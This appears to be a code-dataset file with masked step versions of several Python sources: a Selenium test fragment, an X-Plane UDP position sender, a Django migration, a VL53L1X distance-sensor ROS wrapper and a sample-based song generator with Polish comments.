17 | click | css=body > img |\n self.driver.find_element(By.CSS_SELECTOR, \"body > img\").click()\n # 18 | click | css=a > img |\n self.driver.find_element(By.CSS_SELECTOR, \"a > img\").click()\n # 19 | click | id=main.html.btn_logout |\n self.driver.find_element(By.ID, \"main.html.btn_logout\").click()\n",
"step-ids": [
0,
1,
4,
5,
6
]
}
|
[
0,
1,
4,
5,
6
] |
import socket
import struct
from fsuipc_airspaces.position import Position
# Adapted from tools/faker.js in github.com/foucdeg/airspaces
_START_BUFFER = bytes([68, 65, 84, 65, 60, 20, 0, 0, 0])
_END_BUFFER = bytes([0] * 20)
_START_TRANSPONDER = bytes([104, 0, 0, 0, 0, 0, 0, 0])
_END_TRANSPONDER = bytes([0] * 24)
def _encode(position: Position) -> bytes:
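    """Pack a Position into the fixed-layout binary datagram expected by the
    receiver: a header, three little-endian floats (latitude, longitude,
    altitude), padding, then the transponder code as a float."""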
return _START_BUFFER \
+ struct.pack("<fff", position.latitude, position.longitude, position.altitude) \
+ _END_BUFFER \
+ _START_TRANSPONDER \
+ struct.pack("<f", position.transponder) \
+ _END_TRANSPONDER
class XPlaneDataOut():
def __init__(self, host: str, port: int) -> None:
self.address = (host, port)
self.socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
def write(self, data: Position) -> None:
self.socket.sendto(_encode(data), self.address)
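# Minimal usage sketch (host, port and the `position` object are hypothetical;
# any Position with latitude/longitude/altitude/transponder attributes works):
# XPlaneDataOut("127.0.0.1", 49000).write(position)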
|
normal
|
{
"blob_id": "68fa47e528e5c7c553c3c49ee5b7372b8a956302",
"index": 3364,
"step-1": "<mask token>\n\n\nclass XPlaneDataOut:\n\n def __init__(self, host: str, port: int) ->None:\n self.address = host, port\n self.socket = socket.socket(family=socket.AF_INET, type=socket.\n SOCK_DGRAM)\n\n def write(self, data: Position) ->None:\n self.socket.sendto(_encode(data), self.address)\n",
"step-2": "<mask token>\n\n\ndef _encode(position: Position) ->bytes:\n return _START_BUFFER + struct.pack('<fff', position.latitude, position.\n longitude, position.altitude\n ) + _END_BUFFER + _START_TRANSPONDER + struct.pack('<f', position.\n transponder) + _END_TRANSPONDER\n\n\nclass XPlaneDataOut:\n\n def __init__(self, host: str, port: int) ->None:\n self.address = host, port\n self.socket = socket.socket(family=socket.AF_INET, type=socket.\n SOCK_DGRAM)\n\n def write(self, data: Position) ->None:\n self.socket.sendto(_encode(data), self.address)\n",
"step-3": "<mask token>\n_START_BUFFER = bytes([68, 65, 84, 65, 60, 20, 0, 0, 0])\n_END_BUFFER = bytes([0] * 20)\n_START_TRANSPONDER = bytes([104, 0, 0, 0, 0, 0, 0, 0])\n_END_TRANSPONDER = bytes([0] * 24)\n\n\ndef _encode(position: Position) ->bytes:\n return _START_BUFFER + struct.pack('<fff', position.latitude, position.\n longitude, position.altitude\n ) + _END_BUFFER + _START_TRANSPONDER + struct.pack('<f', position.\n transponder) + _END_TRANSPONDER\n\n\nclass XPlaneDataOut:\n\n def __init__(self, host: str, port: int) ->None:\n self.address = host, port\n self.socket = socket.socket(family=socket.AF_INET, type=socket.\n SOCK_DGRAM)\n\n def write(self, data: Position) ->None:\n self.socket.sendto(_encode(data), self.address)\n",
"step-4": "import socket\nimport struct\nfrom fsuipc_airspaces.position import Position\n_START_BUFFER = bytes([68, 65, 84, 65, 60, 20, 0, 0, 0])\n_END_BUFFER = bytes([0] * 20)\n_START_TRANSPONDER = bytes([104, 0, 0, 0, 0, 0, 0, 0])\n_END_TRANSPONDER = bytes([0] * 24)\n\n\ndef _encode(position: Position) ->bytes:\n return _START_BUFFER + struct.pack('<fff', position.latitude, position.\n longitude, position.altitude\n ) + _END_BUFFER + _START_TRANSPONDER + struct.pack('<f', position.\n transponder) + _END_TRANSPONDER\n\n\nclass XPlaneDataOut:\n\n def __init__(self, host: str, port: int) ->None:\n self.address = host, port\n self.socket = socket.socket(family=socket.AF_INET, type=socket.\n SOCK_DGRAM)\n\n def write(self, data: Position) ->None:\n self.socket.sendto(_encode(data), self.address)\n",
"step-5": "import socket\nimport struct\n\nfrom fsuipc_airspaces.position import Position\n\n\n# Adapted from tools/faker.js in github.com/foucdeg/airspaces\n_START_BUFFER = bytes([68, 65, 84, 65, 60, 20, 0, 0, 0])\n_END_BUFFER = bytes([0] * 20)\n_START_TRANSPONDER = bytes([104, 0, 0, 0, 0, 0, 0, 0])\n_END_TRANSPONDER = bytes([0] * 24)\n\n\ndef _encode(position: Position) -> bytes:\n return _START_BUFFER \\\n + struct.pack(\"<fff\", position.latitude, position.longitude, position.altitude) \\\n + _END_BUFFER \\\n + _START_TRANSPONDER \\\n + struct.pack(\"<f\", position.transponder) \\\n + _END_TRANSPONDER\n\n\nclass XPlaneDataOut():\n def __init__(self, host: str, port: int) -> None:\n self.address = (host, port)\n\n self.socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n\n def write(self, data: Position) -> None:\n self.socket.sendto(_encode(data), self.address)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
# Generated by Django 3.1.3 on 2020-11-27 02:17
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('foodBookApp', '0027_remove_post_total_comments'),
]
operations = [
migrations.AlterField(
model_name='post',
name='likes',
field=models.ManyToManyField(blank=True, related_name='like_post', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='post',
name='privacy',
field=models.CharField(choices=[('public', 'Public'), ('private', 'Private'), ('friends', 'Friends Only')], default='public', max_length=7),
),
migrations.AlterField(
model_name='profile',
name='privacy',
field=models.CharField(choices=[('public', 'Public'), ('private', 'Private'), ('friends', 'Friends Only')], default='public', max_length=7),
),
]
|
normal
|
{
"blob_id": "84d9400dc4ee0bebce3f5f7da0bd77a280bb54a9",
"index": 8503,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [migrations.swappable_dependency(settings.\n AUTH_USER_MODEL), ('foodBookApp', '0027_remove_post_total_comments')]\n operations = [migrations.AlterField(model_name='post', name='likes',\n field=models.ManyToManyField(blank=True, related_name='like_post',\n to=settings.AUTH_USER_MODEL)), migrations.AlterField(model_name=\n 'post', name='privacy', field=models.CharField(choices=[('public',\n 'Public'), ('private', 'Private'), ('friends', 'Friends Only')],\n default='public', max_length=7)), migrations.AlterField(model_name=\n 'profile', name='privacy', field=models.CharField(choices=[(\n 'public', 'Public'), ('private', 'Private'), ('friends',\n 'Friends Only')], default='public', max_length=7))]\n",
"step-4": "from django.conf import settings\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [migrations.swappable_dependency(settings.\n AUTH_USER_MODEL), ('foodBookApp', '0027_remove_post_total_comments')]\n operations = [migrations.AlterField(model_name='post', name='likes',\n field=models.ManyToManyField(blank=True, related_name='like_post',\n to=settings.AUTH_USER_MODEL)), migrations.AlterField(model_name=\n 'post', name='privacy', field=models.CharField(choices=[('public',\n 'Public'), ('private', 'Private'), ('friends', 'Friends Only')],\n default='public', max_length=7)), migrations.AlterField(model_name=\n 'profile', name='privacy', field=models.CharField(choices=[(\n 'public', 'Public'), ('private', 'Private'), ('friends',\n 'Friends Only')], default='public', max_length=7))]\n",
"step-5": "# Generated by Django 3.1.3 on 2020-11-27 02:17\n\nfrom django.conf import settings\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('foodBookApp', '0027_remove_post_total_comments'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='post',\n name='likes',\n field=models.ManyToManyField(blank=True, related_name='like_post', to=settings.AUTH_USER_MODEL),\n ),\n migrations.AlterField(\n model_name='post',\n name='privacy',\n field=models.CharField(choices=[('public', 'Public'), ('private', 'Private'), ('friends', 'Friends Only')], default='public', max_length=7),\n ),\n migrations.AlterField(\n model_name='profile',\n name='privacy',\n field=models.CharField(choices=[('public', 'Public'), ('private', 'Private'), ('friends', 'Friends Only')], default='public', max_length=7),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import VL53L1X
from sensor_msgs.msg import Range
class _VL53L1():
    def __init__(self, address=0x29):
        # accept either an int (e.g. 0x29) or a hex string (e.g. "0x29");
        # int(address, 16) would raise TypeError for the integer default
        if isinstance(address, str):
            address = int(address, 16)
print("initialising sensor with address: {}".format(hex(address)))
try:
self.tof = VL53L1X.VL53L1X(i2c_bus=1, i2c_address=address)
self.tof.open()
self.tof.start_ranging(0)
self.tof.set_timing(30000, 33)
except Exception as e:
print(e)
def set_range(self, rng):
if rng < 4 and rng >= 0:
            self.tof.set_range(rng)
else:
raise Exception("Invalid range: 1 - short, 2 - med, 3 - long")
def set_fov(self, mode):
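        """Narrow the sensor's field of view by selecting a region of interest:
        'wide', 'center', 'top', 'bottom', 'left' or 'right' (anything else
        falls back to the full 16x16 'wide' ROI)."""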
if mode == "wide":
roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)
elif mode == "center":
roi = VL53L1X.VL53L1xUserRoi(6, 9, 9, 6)
elif mode == "top":
roi = VL53L1X.VL53L1xUserRoi(6, 15, 9, 12)
elif mode == "bottom":
roi = VL53L1X.VL53L1xUserRoi(6, 3, 9, 0)
elif mode == "left":
roi = VL53L1X.VL53L1xUserRoi(0, 9, 3, 6)
elif mode == "right":
roi = VL53L1X.VL53L1xUserRoi(12, 9, 15, 6)
else:
roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)
self.tof.set_user_roi(roi)
def read(self):
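        """Take one distance reading and wrap it in a ROS sensor_msgs/Range
        message (infrared radiation type, fixed field-of-view and range limits)."""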
dist = self.tof.get_distance()
msg = Range()
msg.radiation_type = 1
msg.field_of_view = 27
msg.min_range = 0
msg.max_range = 400
msg.range = float(dist)
return msg
|
normal
|
{
"blob_id": "c6d9b971ab6919846807b740313d450d086ecc23",
"index": 7643,
"step-1": "<mask token>\n\n\nclass _VL53L1:\n <mask token>\n\n def set_range(self, rng):\n if rng < 4 and rng >= 0:\n self.tof.set_range()\n else:\n raise Exception('Invalid range: 1 - short, 2 - med, 3 - long')\n <mask token>\n\n def read(self):\n dist = self.tof.get_distance()\n msg = Range()\n msg.radiation_type = 1\n msg.field_of_view = 27\n msg.min_range = 0\n msg.max_range = 400\n msg.range = float(dist)\n return msg\n",
"step-2": "<mask token>\n\n\nclass _VL53L1:\n\n def __init__(self, address=41):\n address = int(address, 16)\n print('initialising sensor with address: {}'.format(hex(address)))\n try:\n self.tof = VL53L1X.VL53L1X(i2c_bus=1, i2c_address=address)\n self.tof.open()\n self.tof.start_ranging(0)\n self.tof.set_timing(30000, 33)\n except Exception as e:\n print(e)\n\n def set_range(self, rng):\n if rng < 4 and rng >= 0:\n self.tof.set_range()\n else:\n raise Exception('Invalid range: 1 - short, 2 - med, 3 - long')\n <mask token>\n\n def read(self):\n dist = self.tof.get_distance()\n msg = Range()\n msg.radiation_type = 1\n msg.field_of_view = 27\n msg.min_range = 0\n msg.max_range = 400\n msg.range = float(dist)\n return msg\n",
"step-3": "<mask token>\n\n\nclass _VL53L1:\n\n def __init__(self, address=41):\n address = int(address, 16)\n print('initialising sensor with address: {}'.format(hex(address)))\n try:\n self.tof = VL53L1X.VL53L1X(i2c_bus=1, i2c_address=address)\n self.tof.open()\n self.tof.start_ranging(0)\n self.tof.set_timing(30000, 33)\n except Exception as e:\n print(e)\n\n def set_range(self, rng):\n if rng < 4 and rng >= 0:\n self.tof.set_range()\n else:\n raise Exception('Invalid range: 1 - short, 2 - med, 3 - long')\n\n def set_fov(self, mode):\n if mode == 'wide':\n roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)\n elif mode == 'center':\n roi = VL53L1X.VL53L1xUserRoi(6, 9, 9, 6)\n elif mode == 'top':\n roi = VL53L1X.VL53L1xUserRoi(6, 15, 9, 12)\n elif mode == 'bottom':\n roi = VL53L1X.VL53L1xUserRoi(6, 3, 9, 0)\n elif mode == 'left':\n roi = VL53L1X.VL53L1xUserRoi(0, 9, 3, 6)\n elif mode == 'right':\n roi = VL53L1X.VL53L1xUserRoi(12, 9, 15, 6)\n else:\n roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)\n self.tof.set_user_roi(roi)\n\n def read(self):\n dist = self.tof.get_distance()\n msg = Range()\n msg.radiation_type = 1\n msg.field_of_view = 27\n msg.min_range = 0\n msg.max_range = 400\n msg.range = float(dist)\n return msg\n",
"step-4": "import VL53L1X\nfrom sensor_msgs.msg import Range\n\n\nclass _VL53L1:\n\n def __init__(self, address=41):\n address = int(address, 16)\n print('initialising sensor with address: {}'.format(hex(address)))\n try:\n self.tof = VL53L1X.VL53L1X(i2c_bus=1, i2c_address=address)\n self.tof.open()\n self.tof.start_ranging(0)\n self.tof.set_timing(30000, 33)\n except Exception as e:\n print(e)\n\n def set_range(self, rng):\n if rng < 4 and rng >= 0:\n self.tof.set_range()\n else:\n raise Exception('Invalid range: 1 - short, 2 - med, 3 - long')\n\n def set_fov(self, mode):\n if mode == 'wide':\n roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)\n elif mode == 'center':\n roi = VL53L1X.VL53L1xUserRoi(6, 9, 9, 6)\n elif mode == 'top':\n roi = VL53L1X.VL53L1xUserRoi(6, 15, 9, 12)\n elif mode == 'bottom':\n roi = VL53L1X.VL53L1xUserRoi(6, 3, 9, 0)\n elif mode == 'left':\n roi = VL53L1X.VL53L1xUserRoi(0, 9, 3, 6)\n elif mode == 'right':\n roi = VL53L1X.VL53L1xUserRoi(12, 9, 15, 6)\n else:\n roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)\n self.tof.set_user_roi(roi)\n\n def read(self):\n dist = self.tof.get_distance()\n msg = Range()\n msg.radiation_type = 1\n msg.field_of_view = 27\n msg.min_range = 0\n msg.max_range = 400\n msg.range = float(dist)\n return msg\n",
"step-5": "import VL53L1X\n\nfrom sensor_msgs.msg import Range\n\nclass _VL53L1():\n\n def __init__(self, address=0x29):\n address = int(address, 16)\n print(\"initialising sensor with address: {}\".format(hex(address)))\n \n try:\n self.tof = VL53L1X.VL53L1X(i2c_bus=1, i2c_address=address)\n self.tof.open()\n self.tof.start_ranging(0) \n self.tof.set_timing(30000, 33)\n except Exception as e:\n print(e)\n\n def set_range(self, rng):\n if rng < 4 and rng >= 0:\n self.tof.set_range()\n else:\n raise Exception(\"Invalid range: 1 - short, 2 - med, 3 - long\")\n\n def set_fov(self, mode):\n\n if mode == \"wide\": \n roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)\n\n elif mode == \"center\":\n roi = VL53L1X.VL53L1xUserRoi(6, 9, 9, 6)\n\n elif mode == \"top\":\n roi = VL53L1X.VL53L1xUserRoi(6, 15, 9, 12)\n\n elif mode == \"bottom\":\n roi = VL53L1X.VL53L1xUserRoi(6, 3, 9, 0)\n\n elif mode == \"left\":\n roi = VL53L1X.VL53L1xUserRoi(0, 9, 3, 6)\n\n elif mode == \"right\":\n roi = VL53L1X.VL53L1xUserRoi(12, 9, 15, 6)\n \n else:\n roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)\n\n self.tof.set_user_roi(roi)\n\n def read(self):\n\n dist = self.tof.get_distance()\n \n msg = Range()\n msg.radiation_type = 1\n msg.field_of_view = 27\n msg.min_range = 0\n msg.max_range = 400\n msg.range = float(dist)\n\n return msg ",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
# -*- coding: utf-8 -*-
"""
Modul do zapisu piosenki (wczytywanie ustawien (defs.txt), tworzenie .wav,
"zglasnianie utworu")
"""
print("Laduje modul o nazwie: "+__name__)
import numpy as np
def wczytywanie_ustawien(plik_konfiguracyjny = "defs.txt"):
"""
wczytywanie pliku z ustawieniami (pliku defs.txt) do slownika
arg:
str: plik_konfiguracyjny - nazwa pliku konfiguracyjnego z podanymi
wartosciami parametrow (tempo itd.)
wyjscie:
dict: parametry - zapisane nazwy i wartosci uzywanych parametrow
"""
import re
import numpy as np
    # read the contents of the file (without the first and last line; one row
    # of the output matrix holds a parameter name and its value as separate
    # elements, stored as strings)
ustawienia = np.genfromtxt(plik_konfiguracyjny, dtype = str, \
skip_header=1, skip_footer=1, delimiter=":")
    # create the dictionary that will hold the values
    parametry = {}
    # strip the "" from the key
    # if there is only 1 parameter (1 line in the file), ustawienia is a variable
    # with shape = (2,), so we index the ustawienia variable directly
if ustawienia.shape == (2,):
parametry[re.sub('"','',ustawienia[0])] = ustawienia[1]
    # if there are more parameters, iterate over the consecutive rows of the
    # ustawienia matrix
else:
for l in ustawienia:
parametry[re.sub('"','',l[0])] = l[1]
    # convert the strings to the appropriate values - I control these parameters,
    # so I do it by hand
    try:
        parametry['tryb'] = parametry['tryb'].strip() # mode
    # if the parameter was not given, continue without raising an error
    except KeyError:
        print("Specify the read mode!")
    try:
        parametry['bpm'] = int(parametry['bpm']) # tempo
    # if the parameter was not given, continue without raising an error
    except KeyError:
        pass
    try:
        parametry['freq'] = int(parametry['freq']) # sampling rate of the output wav
    # if the parameter was not given, continue without raising an error
    except KeyError:
        pass
    try:
        parametry['loud'] = float(parametry['loud']) # volume
    # if the parameter was not given, continue without raising an error
    except KeyError:
        pass
    try:
        # list of weights for the samples
        parametry['wages'] = [float(s) for s in parametry['wages'].split(",")]
    # if the parameter was not given, continue without raising an error
except KeyError:
pass
return parametry
#b = wczytywanie_ustawien("defs.txt")
# adjusting the track volume
def zmiana_glosnosci(utwor, procent = 0):
"""
zmienia glosnosc utworu (jego amplitudy)
arg:
numpy.ndarray (numpy.int16): utwor - dzwiek, ktory ma byc zglosniony
lub zciszony
float: procent - liczba obrazujaca zmiane glosnosci utworu, osiaga
wartosci od -1 do 1, dla 0 brak zmian, dla 1 - "100%
glosniej", dla -1 "100% ciszej"
wyjscie:
numpy.ndarray (numpy.int16): glosniejszy -sciszony lub zglosniony utwor
"""
if(-1 <= procent <= 1):
        # how many times the amplitude of our sound has to be multiplied
mnoznik = 0
if( procent < 0 ):
mnoznik = 1 + procent
else:
            # find the highest amplitude in the track; it determines
            # how much we can turn the volume up
maks_ampli = 0
maks_ampli = max(abs(utwor))
            mnoznik = 32767/maks_ampli # maximum multiplier
            # the multiplier can be at minimum 1; the part above 1
            # (mnoznik - 1) is scaled by the volume-change percentage
            # and added to the base (i.e. 1)
mnoznik = 1 + (mnoznik - 1)*procent
glosniej = mnoznik * utwor
#glosniej = np.array(glosniej, dtype=np.int16)
glosniej = glosniej.astype(np.int16)
return glosniej
else:
print("Podaj procent z zakresu -1 do 1")
#wierszyk1 = zmiana_glosnosci(wierszyk, b['loud'])
#wierszyk1
def tworzenie_piosenki(macierz_piosenki, czy_pelna = True, bpm = 120, \
freq = 44100, wages = None, loud = 0):
"""
glowna funkcja generujaca cala piosenke
arg:
numpy.ndarray (str: U2): macierz_piosenki - macierz zawierajaca
definicje kolejnych cwiercnut (co ma byc grane
w danej cwiercnucie)
bool: czy_pelna - zmienna sprawdzajaca czy macierz_piosenki jest
zapisana (nie jest, gdy tracki mialy nieodpowiednia
liczbe wierszy lub kolumn)
int: bpm - tempo piosenki w jednostce bpm
int: freq - ilosc probek w jednej sekundzie
list (float): wages - wagi kolejnych sampli (jakie znaczenie ma miec 1
probka, 2 etc.)
float: loud - procent glosnosci, 0 - tak jak oryginalne probki, 1 - na
maxa, -1 - sciszamy na maxa
wyjscie:
numpy.ndarray (numpy.int16): gotowy utwór
"""
    # the song matrix was empty, the song was not created
if(czy_pelna == False):
print("Nie utworzono piosenki")
return None
else:
import numpy as np
import scipy.io.wavfile
        t_cwiercnuty = 60 / bpm # duration of one quarter note (depends on the
        # tempo)
        ile_cwiercnut = macierz_piosenki.shape[0] # number of quarter notes
        kanaly = macierz_piosenki.shape[1] # number of samples in use
        frekw = freq
        czas_utworu = ile_cwiercnut*t_cwiercnuty
        # how many elements the new track will have
        ilosc_probek = int(frekw*czas_utworu)
        # we only want to read the contents of sampleXY.wav once, so we need
        # the unique sample numbers
        rozne_sample = np.unique(macierz_piosenki) # includes "--" as well
        # the parameters of these samples are stored in dictionaries
        # dictionary with the values of each sample (i.e. numpy arrays of
        # amplitudes)
        sample_co = {}
        sample_frekw = {} # dictionary with their sampling rates
        sample_dl = {} # dictionary with their lengths
        # load these samples
        # the iterator yields the strings "01", "02", "--" etc.!!!
for ktory_sampel in rozne_sample:
if(ktory_sampel != '--'):
                # build the sample's file name, e.g. "sample01.wav"
                plik = ''.join(['sample',ktory_sampel,'.wav'])
                # read the contents and the sampling rate of the sample into
                # the correspondingly named entries of the sample_co and
                # sample_frekw dictionaries
                sample_frekw[ktory_sampel], sample_co[ktory_sampel] = \
                scipy.io.wavfile.read(plik)
                # convert our sample to mono
                sample_co[ktory_sampel] = np.mean(sample_co[ktory_sampel],\
                axis=1)/32767
                # normalise these values
                sample_co[ktory_sampel] = np.int16(sample_co[ktory_sampel]/ \
                max(np.abs(sample_co[ktory_sampel])) * 32767)
                # store the length of the sample, i.e. the number of frames
                # ( = duration*sampling rate)
                sample_dl[ktory_sampel] = sample_co[ktory_sampel].shape[0]
            else: # do the same for "--", setting the values by hand
                # produce silence for --
                sample_co[ktory_sampel] = np.zeros((1,), dtype=np.int16)
                sample_frekw[ktory_sampel] = frekw # same as the default
                sample_dl[ktory_sampel] = 0 # assume a duration of 0 seconds
if wages is None:
wages = np.ones((1,kanaly))
else:
            # so that the shape is (1,kanaly) and not (kanaly,)
            wages = np.array(wages).reshape(1,kanaly)
        # definition of the new track
T = np.linspace(0, czas_utworu, ilosc_probek)
for wiersz in range(0, ile_cwiercnut):
            sample = [] # samples used in this quarter note
            dlugosci = [] # their lengths within this quarter note
for i in range(0, kanaly):
sampus = macierz_piosenki[wiersz,i]
sample.append(sample_co[sampus])
dlugosci.append(sample_dl[sampus])
            # take the longest sample and play it in full; the remaining
            # samples are also played in full and padded with silence
            # (zeros) once they end
            maksik = max(dlugosci)
            # a matrix of size (number of samples) x (max length), ready for
            # mixing these sounds into one
            pusty = np.int16(np.zeros((len(sample), maksik)))
            # add our sounds to this empty matrix
for k in range(0, kanaly):
pusty[k][0:dlugosci[k]] = sample[k]
            # multiply the rows of pusty (i.e. the samples) by the
            # weights and sum them
            cwiercnuta = np.dot(wages, pusty)
            # this has shape (1, x) but we want (x,), so take the first
            # element
            cwiercnuta = cwiercnuta[0]
            # start of the current quarter note
            poczatek_cwiercnuty = int(wiersz*t_cwiercnuty*frekw)
            # if adding the last quarter notes would exceed the length of
            # the track being created, trim the final sounds so that they
            # fit within this length
if (poczatek_cwiercnuty + maksik) > ilosc_probek:
T[poczatek_cwiercnuty:(poczatek_cwiercnuty + maksik)]=\
cwiercnuta[0:len(T[poczatek_cwiercnuty:(poczatek_cwiercnuty +\
maksik)])]
else:
T[poczatek_cwiercnuty:(poczatek_cwiercnuty + maksik)] += \
cwiercnuta
T= np.array(T, dtype=np.int16)
        # set the volume of the track
T = zmiana_glosnosci(T, loud)
return T
#pios, k = wczytywanie_sciezek(a)
#wierszyk = tworzenie_piosenki(pios, k, bpm = b['bpm'], freq = b['freq'], \
#wages = b['wages'])
#wierszyk = tworzenie_piosenki(pios, k, **b)
#wierszyk
|
normal
|
{
"blob_id": "8220a6d33cda5861e74d6236757abbc81685a998",
"index": 6369,
"step-1": "<mask token>\n\n\ndef wczytywanie_ustawien(plik_konfiguracyjny='defs.txt'):\n \"\"\" \n wczytywanie pliku z ustawieniami (pliku defs.txt) do slownika\n \n arg:\n str: plik_konfiguracyjny - nazwa pliku konfiguracyjnego z podanymi \n wartosciami parametrow (tempo itd.)\n \n wyjscie:\n dict: parametry - zapisane nazwy i wartosci uzywanych parametrow\n \n \"\"\"\n import re\n import numpy as np\n ustawienia = np.genfromtxt(plik_konfiguracyjny, dtype=str, skip_header=\n 1, skip_footer=1, delimiter=':')\n parametry = {}\n if ustawienia.shape == (2,):\n parametry[re.sub('\"', '', ustawienia[0])] = ustawienia[1]\n else:\n for l in ustawienia:\n parametry[re.sub('\"', '', l[0])] = l[1]\n try:\n parametry['tryb'] = parametry['tryb'].strip()\n except KeyError:\n print('Podaj tryb odczytu!')\n try:\n parametry['bpm'] = int(parametry['bpm'])\n except KeyError:\n pass\n try:\n parametry['freq'] = int(parametry['freq'])\n except KeyError:\n pass\n try:\n parametry['loud'] = float(parametry['loud'])\n except KeyError:\n pass\n try:\n parametry['wages'] = [float(s) for s in parametry['wages'].split(',')]\n except KeyError:\n pass\n return parametry\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef wczytywanie_ustawien(plik_konfiguracyjny='defs.txt'):\n \"\"\" \n wczytywanie pliku z ustawieniami (pliku defs.txt) do slownika\n \n arg:\n str: plik_konfiguracyjny - nazwa pliku konfiguracyjnego z podanymi \n wartosciami parametrow (tempo itd.)\n \n wyjscie:\n dict: parametry - zapisane nazwy i wartosci uzywanych parametrow\n \n \"\"\"\n import re\n import numpy as np\n ustawienia = np.genfromtxt(plik_konfiguracyjny, dtype=str, skip_header=\n 1, skip_footer=1, delimiter=':')\n parametry = {}\n if ustawienia.shape == (2,):\n parametry[re.sub('\"', '', ustawienia[0])] = ustawienia[1]\n else:\n for l in ustawienia:\n parametry[re.sub('\"', '', l[0])] = l[1]\n try:\n parametry['tryb'] = parametry['tryb'].strip()\n except KeyError:\n print('Podaj tryb odczytu!')\n try:\n parametry['bpm'] = int(parametry['bpm'])\n except KeyError:\n pass\n try:\n parametry['freq'] = int(parametry['freq'])\n except KeyError:\n pass\n try:\n parametry['loud'] = float(parametry['loud'])\n except KeyError:\n pass\n try:\n parametry['wages'] = [float(s) for s in parametry['wages'].split(',')]\n except KeyError:\n pass\n return parametry\n\n\ndef zmiana_glosnosci(utwor, procent=0):\n \"\"\"\n zmienia glosnosc utworu (jego amplitudy)\n \n arg:\n numpy.ndarray (numpy.int16): utwor - dzwiek, ktory ma byc zglosniony \n lub zciszony\n \n float: procent - liczba obrazujaca zmiane glosnosci utworu, osiaga \n wartosci od -1 do 1, dla 0 brak zmian, dla 1 - \"100% \n glosniej\", dla -1 \"100% ciszej\"\n \n wyjscie:\n numpy.ndarray (numpy.int16): glosniejszy -sciszony lub zglosniony utwor\n \"\"\"\n if -1 <= procent <= 1:\n mnoznik = 0\n if procent < 0:\n mnoznik = 1 + procent\n else:\n maks_ampli = 0\n maks_ampli = max(abs(utwor))\n mnoznik = 32767 / maks_ampli\n mnoznik = 1 + (mnoznik - 1) * procent\n glosniej = mnoznik * utwor\n glosniej = glosniej.astype(np.int16)\n return glosniej\n else:\n print('Podaj procent z zakresu -1 do 1')\n\n\ndef tworzenie_piosenki(macierz_piosenki, czy_pelna=True, bpm=120, freq=\n 44100, wages=None, loud=0):\n \"\"\"\n glowna funkcja generujaca cala piosenke\n \n arg:\n numpy.ndarray (str: U2): macierz_piosenki - macierz zawierajaca \n definicje kolejnych cwiercnut (co ma byc grane \n w danej cwiercnucie)\n \n bool: czy_pelna - zmienna sprawdzajaca czy macierz_piosenki jest \n zapisana (nie jest, gdy tracki mialy nieodpowiednia \n liczbe wierszy lub kolumn)\n \n int: bpm - tempo piosenki w jednostce bpm\n \n int: freq - ilosc probek w jednej sekundzie\n \n list (float): wages - wagi kolejnych sampli (jakie znaczenie ma miec 1 \n probka, 2 etc.)\n \n float: loud - procent glosnosci, 0 - tak jak oryginalne probki, 1 - na \n maxa, -1 - sciszamy na maxa\n \n wyjscie:\n numpy.ndarray (numpy.int16): gotowy utwór\n \n \"\"\"\n if czy_pelna == False:\n print('Nie utworzono piosenki')\n return None\n else:\n import numpy as np\n import scipy.io.wavfile\n t_cwiercnuty = 60 / bpm\n ile_cwiercnut = macierz_piosenki.shape[0]\n kanaly = macierz_piosenki.shape[1]\n frekw = freq\n czas_utworu = ile_cwiercnut * t_cwiercnuty\n ilosc_probek = int(frekw * czas_utworu)\n rozne_sample = np.unique(macierz_piosenki)\n sample_co = {}\n sample_frekw = {}\n sample_dl = {}\n for ktory_sampel in rozne_sample:\n if ktory_sampel != '--':\n plik = ''.join(['sample', ktory_sampel, '.wav'])\n sample_frekw[ktory_sampel], sample_co[ktory_sampel\n ] = scipy.io.wavfile.read(plik)\n sample_co[ktory_sampel] = np.mean(sample_co[ktory_sampel],\n axis=1) / 32767\n sample_co[ktory_sampel] = 
np.int16(sample_co[ktory_sampel] /\n max(np.abs(sample_co[ktory_sampel])) * 32767)\n sample_dl[ktory_sampel] = sample_co[ktory_sampel].shape[0]\n else:\n sample_co[ktory_sampel] = np.zeros((1,), dtype=np.int16)\n sample_frekw[ktory_sampel] = frekw\n sample_dl[ktory_sampel] = 0\n if wages is None:\n wages = np.ones((1, kanaly))\n else:\n wages = np.array(wages).reshape(1, kanaly)\n T = np.linspace(0, czas_utworu, ilosc_probek)\n for wiersz in range(0, ile_cwiercnut):\n sample = []\n dlugosci = []\n for i in range(0, kanaly):\n sampus = macierz_piosenki[wiersz, i]\n sample.append(sample_co[sampus])\n dlugosci.append(sample_dl[sampus])\n maksik = max(dlugosci)\n pusty = np.int16(np.zeros((len(sample), maksik)))\n for k in range(0, kanaly):\n pusty[k][0:dlugosci[k]] = sample[k]\n cwiercnuta = np.dot(wages, pusty)\n cwiercnuta = cwiercnuta[0]\n poczatek_cwiercnuty = int(wiersz * t_cwiercnuty * frekw)\n if poczatek_cwiercnuty + maksik > ilosc_probek:\n T[poczatek_cwiercnuty:poczatek_cwiercnuty + maksik\n ] = 